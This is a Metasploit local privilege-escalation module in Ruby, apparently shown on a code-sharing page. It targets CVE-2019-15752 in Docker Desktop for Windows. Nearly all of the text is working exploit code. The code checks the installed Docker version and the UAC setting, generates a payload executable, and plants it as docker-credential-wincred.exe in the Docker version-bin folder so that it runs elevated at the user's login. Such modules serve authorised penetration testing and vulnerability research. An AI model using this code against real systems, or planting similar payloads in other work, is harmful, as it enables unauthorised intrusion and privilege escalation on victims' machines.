Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::EXE
10
  include Msf::Exploit::FileDropper
11
  include Post::Windows::Priv
12
  include Post::Windows::Runas
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation',
19
        'Description' => %q{
20
          This exploit leverages a vulnerability in docker desktop
21
          community editions prior to 2.1.0.1 where an attacker can write
22
          a payload to a lower-privileged area to be executed
23
          automatically by the docker user at login.
24
        },
25
        'License' => MSF_LICENSE,
26
        'Author' => [
27
          'Morgan Roman', # discovery
28
          'bwatters-r7', # metasploit module
29
        ],
30
        'Platform' => ['win'],
31
        'SessionTypes' => ['meterpreter'],
32
        'Targets' => [[ 'Automatic', {} ]],
33
        'DefaultTarget' => 0,
34
        'DefaultOptions' => {
35
          'WfsDelay' => 15
36
        },
37
        'DisclosureDate' => '2019-07-05',
38
        'Notes' => {
39
          'Stability' => [ CRASH_SAFE ],
40
          'Reliability' => [ REPEATABLE_SESSION ],
41
          'SideEffects' => [ ARTIFACTS_ON_DISK ]
42
        },
43
        'References' => [
44
          ['CVE', '2019-15752'],
45
          ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e']
46
        ]
47
      )
48
    )
49
    register_options(
50
      [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])]
51
    )
52
  end
53

54
  def docker_version
55
    output = cmd_exec('cmd.exe', '/c docker -v')
56
    vprint_status(output)
57
    version_string = output.match(/version (\d+\.\d+\.\d)/)[1]
58
    Rex::Version.new(version_string.split('.').map(&:to_i).join('.'))
59
  end
60

61
  def check
62
    if docker_version <= Rex::Version.new('18.09.0')
63
      return CheckCode::Appears
64
    end
65

66
    CheckCode::Safe
67
  end
68

69
  def exploit
70
    check_permissions!
71
    case get_uac_level
72
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
73
      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
74
      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
75
      fail_with(Failure::NotVulnerable,
76
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
77
    when UAC_DEFAULT
78
      print_good('UAC is set to Default')
79
      print_good('BypassUAC can bypass this setting, continuing...')
80
    when UAC_NO_PROMPT
81
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
82
      shell_execute_exe
83
      return
84
    end
85

86
    # make payload
87
    docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin")
88
    fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path)
89
    payload_name = 'docker-credential-wincred.exe'
90
    payload_pathname = "#{docker_path}\\#{payload_name}"
91
    vprint_status('Making Payload')
92
    payload = generate_payload_exe
93

94
    # upload Payload
95
    vprint_status("Uploading Payload to #{payload_pathname}")
96
    write_file(payload_pathname, payload)
97
    vprint_status('Payload Upload Complete')
98
    print_status('Waiting for user to attempt to login')
99
  end
100

101
  def check_permissions!
102
    unless check == Exploit::CheckCode::Appears
103
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
104
    end
105
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
106
    # Check if you are an admin
107
    # is_in_admin_group can be nil, true, or false
108
  end
109
end
110

111